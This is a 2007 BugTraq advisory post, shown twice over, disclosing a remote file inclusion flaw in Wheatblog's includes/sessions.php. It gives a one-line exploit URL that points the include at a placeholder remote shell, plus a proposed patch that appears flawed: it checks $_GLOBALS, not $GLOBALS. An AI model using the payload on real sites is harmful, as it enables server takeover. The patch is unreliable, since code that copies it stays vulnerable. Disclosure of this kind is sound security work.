BugTraq
Back to list
|
Post reply
Wheatblog (wB) Remote File inclusion ..
Nov 22 2007 09:30AM
security soqor net
Hello,,
Wheatblog (wB) Remote File inclusion ..
tested on 1.1 and older versions are injected
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security (at) soqor (dot) net [email concealed]
Remote File Inclusion
file : includes/sessions.php
line 2 :
code:-
include_once("$wb_class_dir/classDatabase.php");
variable wb_class_dir can be controlled and edited to be included from remote ..
Solution
replace
code :-
include_once("$wb_class_dir/classDatabase.php");
with
code:-
// Protected By : HACKERS PAL
// Security (at) soqor (dot) net [email concealed]
// Http://WwW.SoQoR.NeT
if(eregi("sessions.php",$PHP_SELF) || isset($_GLOBALS['wb_class_dir']))
{
die("<h1>Forbidden 403<br> Protected By : HACKERS PAL</h1>");
}
include_once("$wb_class_dir/classDatabase.php");
Exploit : -
includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?
#WwW.SoQoR.NeT
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Wheatblog (wB) Remote File inclusion ..
tested on 1.1 and older versions are injected
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security (at) soqor (dot) net [email concealed]
Remote File Inclusion
file : includes/sessions.php
line 2 :
code:-
include_once("$wb_class_dir/classDatabase.php");
variable wb_class_dir can be controlled and edited to be included from remote ..
Solution
replace
code :-
include_once("$wb_class_dir/classDatabase.php");
with
code:-
// Protected By : HACKERS PAL
// Security (at) soqor (dot) net [email concealed]
// Http://WwW.SoQoR.NeT
if(eregi("sessions.php",$PHP_SELF) || isset($_GLOBALS['wb_class_dir']))
{
die("<h1>Forbidden 403<br> Protected By : HACKERS PAL</h1>");
}
include_once("$wb_class_dir/classDatabase.php");
Exploit : -
includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?
#WwW.SoQoR.NeT
[ reply ]